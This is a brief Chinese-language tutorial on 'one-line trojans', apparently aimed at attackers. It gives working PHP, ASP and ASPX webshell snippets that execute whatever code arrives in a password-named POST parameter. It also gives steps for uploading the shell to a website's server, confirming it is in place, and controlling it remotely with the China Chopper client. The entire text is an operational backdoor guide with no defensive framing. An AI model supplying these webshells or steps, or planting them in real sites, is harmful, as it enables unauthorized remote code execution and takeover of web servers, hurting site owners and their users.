php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话木马是: <%eval request ("pass")%>
aspx的一句话木马是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
其中pass为设置的密码,可修改
操作方法:
新建txt文件,将与网站对应的代码黏贴进去,然后保存,修改txt文档格式为复制的代码格式如:xx.php,把文件上传到网站后台服务器当中即可。
注:直接放入head头部虽然也可以,但会出现网络拦截错误。同时使用网站路径+文件名的格式验证(http://www.xxxx.com/xx.php)是否放入正确,验证成功是一个空页面不会出现404
菜刀使用:
进入chopper.exe,右键添加,域名哪里填上(http://www.xxxx.com/xx.php),然后输入密码pass,然后确认添加即可